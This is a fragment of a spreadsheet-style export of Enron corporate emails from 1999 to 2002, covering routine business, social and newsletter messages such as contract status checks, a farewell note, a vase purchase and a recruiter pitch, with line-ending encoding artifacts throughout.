 Members and Member Firms have (10) days from the date of this notice to=20_x000D_
advise the Corporate Secretary=01,s Office of any claims in accordance with=_x000D_
 Rule=20_x000D_
2.51._x000D_
_x000D_
 Inquiries regarding the above should be addressed to the Member Services=_x000D_
=20_x000D_
Department (212) 299-2379._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=3Dtana.jones@enron.com&amp;=_x000D_
refdo_x000D_
c=3D(MS-15)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 15:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'al.herrmann@chron.com'})</t>
  </si>
  <si>
    <t>Sat Jan 20th</t>
  </si>
  <si>
    <t>Hey, you. Sat. Jan 20th is both Jody's and Marco's 32nd birthday. At_x000D_
about_x000D_
10:30, we're all going to the Lone Star Saloon at 1900 Travis to get_x000D_
drunk._x000D_
You should come._x000D_
_x000D_
Here's a map:_x000D_
http://albums.photopoint.com/j/ViewPhoto?u=155943&amp;a=11011690&amp;p=38301696_x000D_
_x000D_
xox,_x000D_
Al</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:48:41 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'postmaster@fullenweider.com'})</t>
  </si>
  <si>
    <t>Delivered: RE: Stepenovitch</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;RE: Stepenovitch&gt;&gt; Your message_x000D_
_x000D_
  To:      jls@fullenweider.com_x000D_
  Subject: RE: Stepenovitch_x000D_
  Sent:    Mon, 29 Oct 2001 10:56:36 -0600_x000D_
_x000D_
was delivered to the following recipient(s):_x000D_
_x000D_
Jonda Stowell on Mon, 29 Oct 2001 10:48:41 -0600_x000D_
_x000D_
_x000D_
Message-ID: &lt;OF36511615.949FBAAA-ON86256AF4.005D153B@enron.com&gt;_x000D_
From: Joe.Stepenovitch@enron.com_x000D_
To: jls@fullenweider.com_x000D_
Subject: RE: Stepenovitch_x000D_
Date: Mon, 29 Oct 2001 10:56:36 -0600_x000D_
Return-Receipt-To: Joe.Stepenovitch@enron.com_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2653.19)_x000D_
X-MS-Embedded-Report:_x000D_
Content-Type: text/plain;	charset="iso-8859-1"</t>
  </si>
  <si>
    <t>Fri, 29 Jun 2001 08:18:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jj@johnjesse.com'})</t>
  </si>
  <si>
    <t>Re: Venini</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I will be around this week.  It's hard to predict my schedule, so just call_x000D_
&gt; anytime._x000D_
&gt;_x000D_
&gt; Regards,_x000D_
&gt;_x000D_
&gt; Jeff_x000D_
&gt;_x000D_
&gt;   -----Original Message-----_x000D_
&gt;  From:   john jesse &lt;jj@johnjesse.com&gt;@ENRON_x000D_
&gt;_x000D_
&gt;_x000D_
[mailto:IMCEANOTES-john+20jesse+20+3Cjj+40johnjesse+2Ecom+3E+40ENRON@ENRON.c_x000D_
om&gt; ]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  Sent:   Tuesday, June 26, 2001 12:00 PM_x000D_
&gt;  To:     Shankman, Jeffrey A._x000D_
&gt;  Subject:  Re: Venini_x000D_
&gt;_x000D_
&gt;&gt; Hi John, hope you've been well.  Is the Venini still available?  What_x000D_
&gt;  is_x000D_
&gt;&gt; the year?  Jeff_x000D_
&gt;&gt;_x000D_
&gt;&gt;   -----Original Message-----_x000D_
&gt;&gt;  From:   john jesse &lt;jj@johnjesse.com&gt;@ENRON_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;  [mailto:IMCEANOTES-john+20jesse+20+3Cjj+40johnjesse+2Ecom+3E+40ENRON@ENRON.c_x000D_
&gt;  om&gt; ]_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;  Sent:   Friday, March 30, 2001 8:44 AM_x000D_
&gt;&gt;  To:     Shankman, Jeffrey A._x000D_
&gt;&gt;  Subject:  Venini_x000D_
&gt;&gt;_x000D_
&gt;&gt;  Dear Jeffrey. . .attached is an image of the Venini vase which is_x000D_
&gt;  etched_x000D_
&gt;&gt;  on_x000D_
&gt;&gt;  the base Venini Murano Italy and is 9 3/4 ins high. Price is ?2200_x000D_
&gt;&gt;_x000D_
&gt;&gt;  The Knox vase is best seen in Steve Martins book...(the same model_x000D_
&gt;  but_x000D_
&gt;&gt;  same_x000D_
&gt;&gt;  date 1905.  My one is 9 1/2 ins tall.  Price  ?11000_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;  Regards_x000D_
&gt;&gt;  John_x000D_
&gt;&gt;  Email: jj@johnjesse.com_x000D_
&gt;&gt;   - Venini3.jpg &lt;&lt; File: Venini3.jpg &gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;  Hi Jeff. . .Yes the Venini is still available and the date can only be_x000D_
&gt;  described as circa 1950's.  It has the three line etched mark Venini_x000D_
&gt;  Murano  Italia._x000D_
&gt;_x000D_
&gt;  Are you in your office over the next few days so that I can find a slot_x000D_
&gt;  to_x000D_
&gt;  give you a call.  Please suggest a time._x000D_
&gt;_x000D_
&gt;  I hope you didn't have any trouble with Hurricane Alison. . ._x000D_
&gt;  --_x000D_
&gt;_x000D_
&gt;  Regards_x000D_
&gt;  John_x000D_
&gt;  Email: jj@johnjesse.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
I have taken the Venini Fazzoletto vase to the Packing shop today, addressed_x000D_
to Smith St and you should receive it early next week.   The price of ?2100_x000D_
should be deducted from your ?10000 credit.  But let me know what you want_x000D_
to do_x000D_
--_x000D_
_x000D_
Regards_x000D_
John_x000D_
Email: jj@johnjesse.com_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Mar 2000 03:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mike.shannon@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'boris.brevnov@enron.com', 'ivy.bradberry@enron.com', 'simon.shih@enron.com', 'bryan_begley@mckinsey.com', 'natalie.halich@enron.com', 'richard.dimichele@enron.com', 'stephen.barth@enron.com', 'mateo.vegalara@enron.com', 'vito.iaia@enron.com', 'jeff.hoover@enron.com', 'traci.warner@enron.com', 'larie.harsell@enron.com', 'theresa.davis@enron.com', 'marissa.womble@enron.com', 'andy.unverzagt@enron.com', 'lewis.worthy@enron.com', 'todd.henne@enron.com', 'tchandler@velaw.com', 'mike.mcconnell@enron.com', 'kristy.carnes@enron.com', 'frank.vela@enron.com', 'will.nolen@enron.com', 'kristina.mordaunt@enron.com', 'molly.lafuze@enron.com', 'ace.roman@enron.com', 'jimmie.williams@enron.com', 'joseph.deffner@enron.com', 'christy.young@enron.com', 'eric.mason@enron.com', 'innocominc@aol.com', 'shelly.friesenhahn@enron.com', 'gallin.fortunov@enron.com', 'grant.carter@enron.com', 'stephen.douglas@enron.com', 'kyle.kettler@enron.com', 'michael.krautz@enron.com', 'jeff.donahue@enron.com', 'kim.womack@enron.com', 'kevin.howard@enron.com', 'jim.pyke@enron.com', 'jason.thompkins@enron.com', 'rob.brown@enron.com', 'david.cox@enron.com', 'eleanor.fraser@enron.com', 'michael.vigeant@enron.com', 'david.crews@enron.com', 'jordan.mintz@enron.com', 'brad.alford@enron.com', 'rhett.jackson@enron.com', 'dduran@ect.enron.com', 'larry.lawyer@enron.com', 'benjamin.rogers@enron.com', 'kirk.neuner@enron.com', 'michael.freel@enron.com', 'trushar.patel@enron.com', 'thodges@velaw.com', 'mspradling@velaw.com', 'scott.pleus@enron.com', 'meryl.barnett@enron.com', 'gfoster@antigenics.com', 'don.khamapirad@enron.com', 'paula.rieker@enron.com', 'joseph.galan@enron.com', 'nicole.palczer@enron.com', 'bmierts@ect.enron.com', 'dee.madole@enron.com', 'scott.vonderheide@enron.com', 'humberto.cubillos-uejbe@enron.com', 'john.hay@enron.com', 'adrian_reed@mckinsey.com', 'james.row@enron.com', 'roger.ondreko@enron.com', 'brandon.neff@enron.com', 'john.gelder@enron.com', 'nicole.alvino@enron.com', 'tyates@velaw.com', 'terri.bachand@enron.com', 'sarah.heineman@enron.com', 'laura.howenstine@enron.com', 'stuart.schardin@enron.com', 'gil.melman@enron.com', 'ravi.thuraisingham@enron.com', 'michael.harris@enron.com', 'jason_heuring@mckinsey.com', 'leroy.ho@enron.com', 'rebekah.rushing@enron.com', 'ashley.dietz@enron.com', 'ceci.twachtman@enron.com', 'paul.trieschman@enron.com', 'catherine.pernot@enron.com', 'omer.muftuler@enron.com', 'cheryl.lipshutz@enron.com', 'michael.kopper@enron.com', 'travis.mccullough@enron.com', 'key.kasravi@enron.com', 'brian.hendon@enron.com', 'bruce.rudy@enron.com', 'crankin@velaw.com', 'steven.sheldon@enron.com', 'mark.russ@enron.com', 'rusty.kelley@enron.com', 'stephanie.goldman@enron.com', 'courtney.childers@enron.com', 'jennifer.riley@enron.com', 'kfullenweider@velaw.com', 'yelena.lungin@enron.com', 'mark.koenig@enron.com', 'cindy.justice@enron.com', 'gsasser@velaw.com', 'john.mcclain@enron.com', 'grant.zimmerman@enron.com', 'anne.yaeger@enron.com', 'ben.glisan@enron.com', 'amy.lehnert@enron.com', 'jennifer.adams@enron.com', 'brad.peden@enron.com', 'garrett.ashmore@enron.com', 'inez.dauterive@enron.com', 'michael.stockton@enron.com', 'todd.neugebauer@enron.com', 'mbeckworth@velaw.com', 'palmer.letzerich@enron.com', 'robert.hoodis@enron.com', 'kevin.garland@enron.com', 'anuj.gupta@enron.com', 'julie.ferrara@enron.com', 'brett.schulick@enron.com', 'bret.scholtes@enron.com', 'bill.abler@enron.com', 'sarah.goodpastor@enron.com', 'anand.david@enron.com', 'scott.werneburg@enron.com', 'brett.sims@enron.com', 'michele.marvin@enron.com'})</t>
  </si>
  <si>
    <t>Last Day at Enron</t>
  </si>
  <si>
    <t>Friends and colleagues,_x000D_
_x000D_
Today, Friday March 10, is my final day at Enron._x000D_
_x000D_
It has been said, =01&amp;Friends are the thermometer by which we may judge the=_x000D_
=20_x000D_
temperature of our fortunes.=018  And so it is, that on my last day at Enro=_x000D_
n, I=20_x000D_
count myself among the most fortunate.  My sincere thanks to you who have=_x000D_
=20_x000D_
given me so much over the past three years and touched my life in so many=_x000D_
=20_x000D_
ways.  I have found Enron to be a special place, full of remarkable=20_x000D_
individuals, and will always have fond memories of my time here._x000D_
_x000D_
On Monday, I am going to Austin to join the George W. Bush campaign.  Durin=_x000D_
g=20_x000D_
this time of transition I can be reached at my new email address =01)=20_x000D_
michaelpshannon@yahoo.com or on my cell phone (713-410-6941).  I hope to ha=_x000D_
ve=20_x000D_
new contact information to all of you by the first part of April.  God=01,s=_x000D_
=20_x000D_
blessings to you for your kindness to me.  Please keep in touch._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 04:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rod.nelson@enron.com'})</t>
  </si>
  <si>
    <t>FLORIDA JUDGE HOLDS NOON HEARING</t>
  </si>
  <si>
    <t>Now do you see what's going on?_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 11/16/2000 12:53 PM -----_x000D_
_x000D_
	Breaking News &lt;abcnewsnow-editor@mail.abcnews.go.com&gt;_x000D_
	Sent by: bounce-abcnews-l-355240@alist0.starwave.com_x000D_
	11/16/2000 10:58 AM_x000D_
	Please respond to Breaking News_x000D_
		 _x000D_
		 To: "ABCNEWS.com Breaking News" &lt;abcnews-l@alist0.starwave.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FLORIDA JUDGE HOLDS NOON HEARING_x000D_
_x000D_
_x000D_
A Florida judge will hold a televised hearing at Noon ET on a Democratic_x000D_
legal challenge to uphold hand recounts of presidential votes in several_x000D_
Florida counties. The move is a challenge to Florida Secretary of State_x000D_
Katherine Harris' decision Wednesday not to allow counties to modify their_x000D_
vote totals._x000D_
_x000D_
Go to ABCNEWS.com to follow all the ongoing legal moves -- and political_x000D_
jostling -- throughout the day._x000D_
_x000D_
_x000D_
http://abcnews.go.com/_x000D_
_x000D_
_x000D_
Plus, read all of the Florida counties' recount petitions, and Florida_x000D_
Secretary of State Katherine Harris' rejection of them:_x000D_
_x000D_
PALM BEACH COUNTY_x000D_
http://abcnews.go.com/sections/politics/DailyNews/palmbeachmemo001115.html_x000D_
MIAMI-DADE COUNTY_x000D_
http://abcnews.go.com/sections/politics/DailyNews/Dadememo001115.html_x000D_
BROWARD COUNTY_x000D_
http://abcnews.go.com/sections/politics/DailyNews/browardmemo001115.html_x000D_
COLLIER COUNTY_x000D_
http://198.106.245.151/sections/politics/DailyNews/colliermemo001115.html_x000D_
HARRIS' STATEMENT_x000D_
http://abcnews.go.com/sections/politics/DailyNews/ELECTION_harrismemo001114.ht_x000D_
ml_x000D_
_x000D_
_x000D_
ABCNEWS.com:  Up to the Moment, Up to You (tm)_x000D_
http://abcnews.go.com_x000D_
---_x000D_
You received this mail because you subscribed via ABCNEWS.com at_x000D_
http://abcnews.go.com/service/mailsub.html_x000D_
_x000D_
If you would like to stop receiving these mailings, unsubscribe at_x000D_
http://abcnews.go.com/service/mailunsub.html_x000D_
_x000D_
Please do not respond to this mail. Questions or comments can be submitted at_x000D_
http://abcnews.go.com/service/abccontact.html</t>
  </si>
  <si>
    <t>Wed, 7 Jun 2000 06:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Cp, please set up 15 minutes some time in July.  thanks, mike_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 06/07/2000 _x000D_
01:02 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Blake Lasuzzo @ ENRON                           06/05/2000 03:23 PM_x000D_
	_x000D_
_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Mr. McConnell,_x000D_
_x000D_
I am an Energy Management major at OU who is interning here at Enron.  My _x000D_
work experience so far has been excellent, and nothing less than what I had _x000D_
hoped for.  I have had the opportunity to hear you speak a few times in _x000D_
Norman and have been very impressed.  I have been impressed by the things you _x000D_
said about this company and its ideals, programs and its commitment to _x000D_
excellence - all of which I have seen since I started work.  The most _x000D_
impressive thing to me, however, were the things you said about positive _x000D_
thinking, goal setting, and the power of the subconscious mind in your talk _x000D_
with the J.C. Penney Leadership Program.  These are beliefs which I have been _x000D_
raised on by my father, and really believe to be true.  It was very _x000D_
inspirational to hear that type of message from someone else for whom it has _x000D_
obviously worked.  As I have started my internship here, I am implementing _x000D_
this psychology into my life and work ethic, and thought you would might have _x000D_
some helpful advice.  I know you are an extremely busy man, but I decided to _x000D_
send you an email and ask if you ever had a few free minutes in which I could _x000D_
speak with you about how this way of thinking has positively impacted your _x000D_
career.  If you ever have a few minutes of free time this summer, I would _x000D_
really appreciate the opportunity to speak with you._x000D_
_x000D_
Thank you for your time_x000D_
_x000D_
Blake Lasuzzo_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 06:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Every year, a holiday gift is sent from the Executive Committee and is _x000D_
normally a donation to a charity of Enron's choice.  This year, we have tried _x000D_
a different approach. Elyse Kalmans and Kathy Mayfield from Community _x000D_
Relations recommended an on-line service called Chairtygift.com.  Each _x000D_
recipient can select the charity of their choice from many hundreds in the _x000D_
United States.  Should they choose to not go on-line and select a charity, _x000D_
the amount of that person's gift will default to DePelchin.  Kathy is _x000D_
receiving thank you notes by e-mail so I wanted to share with you._x000D_
_x000D_
Rosie_x000D_
---------------------- Forwarded by Rosalee Fleming/Corp/Enron on 12/12/2000 _x000D_
02:04 PM ---------------------------_x000D_
_x000D_
Kathy Mayfield_x000D_
12/12/2000 11:01 AM_x000D_
_x000D_
_x000D_
To: Rosalee Fleming/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Thank you for the Charitygift_x000D_
_x000D_
I have received two other thank you notes for the Charitygifts.  Upon _x000D_
redemption, there is a place for recipients to send a thank you via email and _x000D_
currently I am set up as the person to receive them.  Is that ok?  I don't _x000D_
mind and can forward them to you as I get them or save them and get them to _x000D_
you all at once.  It's great feedback and I think Ken would enjoy seeing _x000D_
their responses.  It seems as though people are enjoying getting them and _x000D_
being able to choose one of their favorite charities.  Let me know what you _x000D_
think.  I am also drafting a letter to go to DePelchin letting them know that _x000D_
we are doing this.  Would you like for it to come from Ken?  Thanks, Kathy_x000D_
_x000D_
---------------------- Forwarded by Kathy Mayfield/Corp/Enron on 12/12/2000 _x000D_
10:27 AM ---------------------------_x000D_
_x000D_
_x000D_
Kewp76@aol.com on 12/11/2000 07:51:30 PM_x000D_
To: kathy.mayfield@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Thank you for the Charitygift_x000D_
_x000D_
_x000D_
Kathy,_x000D_
Eileen and I were most pleased to have the opportunity to donate to Southern _x000D_
Tier (NY) Hospice Corporation via the Charity Gift Card that Enron Executive _x000D_
Committee sent us.  Enron displays uncommon leadership in humanitarian _x000D_
activities as well as the business world.  Our thanks go to Ken and the _x000D_
Executive Committee._x000D_
Very truly yours,_x000D_
Buddy and Eileen Leech_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 06:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Song List</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the new tunes.  Hope you like them!  Everyone seems to think they _x000D_
are great..._x000D_
_x000D_
Title	Artist_x000D_
1.   Big Time	Peter Gabriel_x000D_
2.   Every Day is a Winding Road	Sheryl Crow_x000D_
3.   All This Time	Sting_x000D_
4.   The Obvious Child	Paul Simon_x000D_
5.   Check It Out	John Cougar Mellencamp_x000D_
6.   Walking on the Moon	The Police_x000D_
7.   Rock This Town	Stray Cats_x000D_
8.   Crazy	Seal_x000D_
9.   Roam	B-52's_x000D_
10.  Move	Miles Davis_x000D_
11.  Don't You Worry About a Thing	Stevie Wonder_x000D_
12.  Bright Side of the Road	Van Morrison_x000D_
13.  Brand New Day	Sting_x000D_
14.  Bloomdido	Charlie Parker_x000D_
15.  Symphonie No. 5 - Allegro	Beethoven_x000D_
16.  Fantasie - Impromptu 	Chopin_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 09:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Candidate list update &amp; Mtg 3 Specifics</t>
  </si>
  <si>
    <t>Candidate list update:_x000D_
Thank you Troy and Roel for your input into the pre-interview questions. The _x000D_
final list of 12 questions has been sent to 10 of the 12 candidates on the _x000D_
interview list -  we have one confirmed drop-out (he says no contract, no _x000D_
interest) and one who has not yet returned my phone call. _x000D_
_x000D_
Meeting 3 specifics:_x000D_
When - Tuesday, March 6 from 8am to 2pm_x000D_
Where - Enron, 1400 Smith, conference room 50M3_x000D_
What - Interview of selected FC candidates_x000D_
_x000D_
_x000D_
See everyone then,_x000D_
Lisa</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 23:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: JM Huber</t>
  </si>
  <si>
    <t xml:space="preserve">Gerald,_x000D_
_x000D_
When the docs are executed, can I get a copy of them for our file._x000D_
_x000D_
Thanks_x000D_
Russell_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Russell Diamond/HOU/ECT@ECT_x000D_
cc: William S Bradford/HOU/ECT@ECT _x000D_
Subject: Re: JM Huber  _x000D_
_x000D_
Russell,  The 2nd Huber transaction was executed and Huber is contractually _x000D_
bound to take assignment of the transportation.  We have gotten approval of _x000D_
the assignment form from the Pipeline and expect to execute the assignments _x000D_
and capacity release documents with Huber next week.  The capacity release _x000D_
document just specifies the details of the capacity release.  Huber is bound _x000D_
by the 2nd transaction to accept our release.    I will let you know when _x000D_
these sets of documents are executed._x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Russell Diamond_x000D_
	11/03/2000 11:08 AM_x000D_
		 _x000D_
		 To: Gerald Nemec/HOU/ECT@ECT_x000D_
		 cc: William S Bradford/HOU/ECT@ECT_x000D_
		 Subject: JM Huber_x000D_
_x000D_
Gerald,_x000D_
_x000D_
Can you please let me know where we stand with the execution of the JM Huber _x000D_
transactions and contracts that is being originated in the Denver office.  As _x000D_
you are aware the first transaction and contract we entered into did not _x000D_
contain the assignment language for the transportation on a yearly basis.  _x000D_
The second transaction was to include this assignment language.  ENA _x000D_
currently has large exposure from JM Huber for the first transaction because _x000D_
the assignment contracts have not been signed as of yet, as far as I am _x000D_
aware.  If the contract negotiations are going to continue for an extended _x000D_
period of time, Credit is going to have to reserve the transactions to cover _x000D_
this exposure.  Please let me know what the status is._x000D_
_x000D_
Thank you,_x000D_
Russell_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gloria.wier@enron.com'})</t>
  </si>
  <si>
    <t>My Life is in Your Hands</t>
  </si>
  <si>
    <t xml:space="preserve">Larry, I noticed this picture on your desk, so I thought I'd forward the _x000D_
message..._x000D_
_x000D_
_x000D_
 &lt;A HREF="http://www.shockeys.com/friends/mylife.htm"&gt;My Life is in Your Hands_x000D_
&lt;/A&gt;_x000D_
_x000D_
http://www.shockeys.com/friends/mylife.htm_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 08:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Midway Project - Generic Interconnect Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Quien es mas macho?_x000D_
_x000D_
_x000D_
From: Carlos Sole on 05/29/2001 01:30 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: FW: Midway Project - Generic Interconnect Agreement  _x000D_
_x000D_
You'll also be even more proud to know the outcome of the following text that _x000D_
I sent to one of my Mexico clients -- "Matthew, with all due respect, clients _x000D_
will be doing business with Enron as it is indentified in the introductory _x000D_
paragraph and the signature block.  Indeed, as a side note, most of  the _x000D_
documents that I have drafted or reviewed always use some form of acronym for _x000D_
subsequent references to Enron.  I am indifferent, but I know that the reason _x000D_
our accounting brethen made that comment, as well as the other comments they _x000D_
often make that seem counter-intuitive, is that it facilitates their efforts _x000D_
in ensuring that documents reflect off-balance sheet, soft costs related _x000D_
rather than on-balance sheet, hard costs.  As such, I would defer to them on _x000D_
this issue"  which was in response to "Carlos, with all due respect to our _x000D_
Accounting brethren, from a commercial point of view, potential clients don't _x000D_
want to do business with EDM, they want to do business with Enron.  So, _x000D_
please switch the EDM thing back to Enron and everything will be fine."  _x000D_
Anyway, I think Herman must have forwarded  copy of those emails to Lisa who _x000D_
shared it with Joe Deffner and I happened to run into them outside just now _x000D_
and they were both congratulating me for my "toughness".  _x000D_
_x000D_
By separate email, I'll forward you a redlined form of interconnect agreement _x000D_
that we can subsequently discuss._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann_x000D_
	05/29/2001 11:54 AM_x000D_
		 _x000D_
		 To: Carlos Sole/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: FW: Midway Project - Generic Interconnect Agreement_x000D_
_x000D_
Could you email me the list of issues you have encountered thus far.  Ben _x000D_
really wants me to check with you. (I'm so proud!!)_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/29/2001 11:53 _x000D_
AM ---------------------------_x000D_
From: Ben Jacoby/ENRON@enronXgate on 05/29/2001 10:42 AM_x000D_
To: Fred Mitro/ENRON@enronXgate, Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Midway Project - Generic Interconnect Agreement_x000D_
_x000D_
Fred / Kay:_x000D_
_x000D_
I spoke to Duran this morning, and he and I would like to meet together with _x000D_
us to discuss the Midway project and whether or not we will be able to _x000D_
utilize TurboPark Phase 2. I previously told him that because of timing _x000D_
considerations and because there may be certain agreements that will be _x000D_
difficult to make TurboPark compliant (such as the attached interconnect _x000D_
agreement from FPL), that Phase 2 may not be practical for purposes of this _x000D_
project._x000D_
_x000D_
I think this would be a good discussion to have on Friday, because we should _x000D_
have more information on the GE7FAs and should have already spoken with TECO _x000D_
on their proposed MOU (and maybe even the tolling agreement). What are your _x000D_
schedules on Friday?_x000D_
_x000D_
I also would like to schedule a call for tomorrow with TECO to go over the _x000D_
MOU. Fred - Please coordinate with Kay and schedule something with Becky _x000D_
Alex. I would prefer the afternoon if that's OK with you guys, and would like _x000D_
45 min. before the call for us to meet seperately. Also Fred, please advise _x000D_
on the status of the tolling agreement._x000D_
_x000D_
Kay - attached is FPL's standard form interconnect agreement. I was thinking _x000D_
that Carlos would be a good choice to review it as he is currently working _x000D_
with accounting / finance on an Ameren interconnect, so he will already be _x000D_
familiar with the likely issues. Please let me know what you think. It will _x000D_
be important to give Duran a summary of likely accounting / finance issues _x000D_
related to this agreement on Friday. _x000D_
_x000D_
Hope you both had good weekends. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
-----Original Message-----_x000D_
From: Greg Krause_x000D_
Sent: Mon 5/21/2001 9:00 PM_x000D_
To: Christi L Nicolay_x000D_
Cc: Ben Jacoby_x000D_
Subject: Midway Project - Generic Interconnect Agreement_x000D_
_x000D_
Please see attached for your review and comments._x000D_
_x000D_
 &lt;&lt;FPL Construction &amp; Connection Agreement Generic.doc&gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 12:02:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>Rick:  She asked Chris if she could transfer to the DC office.   Lisa</t>
  </si>
  <si>
    <t>Wed, 17 Nov 1999 10:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Early Departure</t>
  </si>
  <si>
    <t>no</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 18:01:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
eSource presents SDC Platinum training_x000D_
_x000D_
SDC Platinum offers detailed transactional information on New Issues, Mergers &amp; Acquisitions, Syndicated Loans, Private Equity, Strategic Alliances, Project Finance and others.  The product is designed to allow users to compare transactions, evaluate advisors, and analyze market and industry trends._x000D_
_x000D_
Training Agenda Includes:_x000D_
?	General Introduction._x000D_
?	Basic query techniques for new issues and M&amp;A databases._x000D_
?	Basic query techniques for trend analysis._x000D_
_x000D_
Attend our SDC Platinum Clinic: _x000D_
				_x000D_
May 30     9:00 -11:30 AM 		EB552_x000D_
_x000D_
_x000D_
Seats fill up fast! To reserve a seat, please call Stephanie E. Taylor at 5-7928_x000D_
Check the eSource training page at http://esource.enron.com/training.doc for additional training sessions and vendor presentations._x000D_
_x000D_
http://esource.enron.com</t>
  </si>
  <si>
    <t>Fri, 27 Jul 2001 13:18:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Socal Allocation Code</t>
  </si>
  <si>
    <t>Starting on the timely process for gas day of July 28th forward. We will now start using the cut code of PRD when we allocate Socal based on there window, whether above or below the 750,000 firm capacity. The only time that you will use the cut code CCD, is when the outage is truly related to TW. There will be more procedure to follow, regarding the data request from FERC. If you have questions or concerns, please ask Terry Kowalke, Darrell Schoolcraft, or Lynn Blair. Your assistance is greatly appreciated.</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 06:17:26 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: As A Promising Energy Professional...</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Alice Barton [mailto:energy_list@spencerstuart.com]_x000D_
Sent: Wednesday, January 16, 2002 1:18 PM_x000D_
To: Lokay, Michelle_x000D_
Subject: As A Promising Energy Professional..._x000D_
_x000D_
_x000D_
Industry sources have identified you as a promising energy professional and we invite you to join our free and exclusive Spencer Stuart Talent Network (SSTN) member database.  SSTN is a leadership development and recruitment service from one of the premier executive search firms in the world.  We invite you to register today at http://www.spencerstuart.com/?promoCode=ENERGY_x000D_
_x000D_
As you may know, Spencer Stuart is one of the world's most exclusive executive search firms.  SpencerStuart.com is our award winning web site and it leverages the quality senior-level relationships and expertise that have been Spencer Stuart's hallmark for over 45 years.  As one of the world's most experienced and trusted executive recruitment firms, we'll provide access to the world's best clients and most desirable positions._x000D_
_x000D_
It takes only ten minutes to join this community of rising stars. You will be asked to complete a simple four-step registration process.  Register today and you'll immediately gain access to a wealth of leadership development and recruitment services. _x000D_
_x000D_
If you have registered, we thank you. You have already taken a major step on your path to professional development and we look forward to providing compelling leadership development and recruitment services to enrich your career endeavors.  _x000D_
_x000D_
If you haven't registered yet, please note that membership with SpencerStuart.com is free and is the most effective way for us to alert you of new opportunities, whether you are actively looking or just curious about what's available in the marketplace. You will also be able to leverage the wealth of career advice and resources available right on the site._x000D_
_x000D_
So, spend your next ten minutes planning your next ten years.  _x000D_
_x000D_
Register today at http://www.spencerstuart.com/registration/content/en/us/calltoregister.asp?promoCode=ENERGY _x000D_
_x000D_
Best wishes,_x000D_
_x000D_
The Spencer Stuart Talent Network Team_x000D_
_x000D_
_x000D_
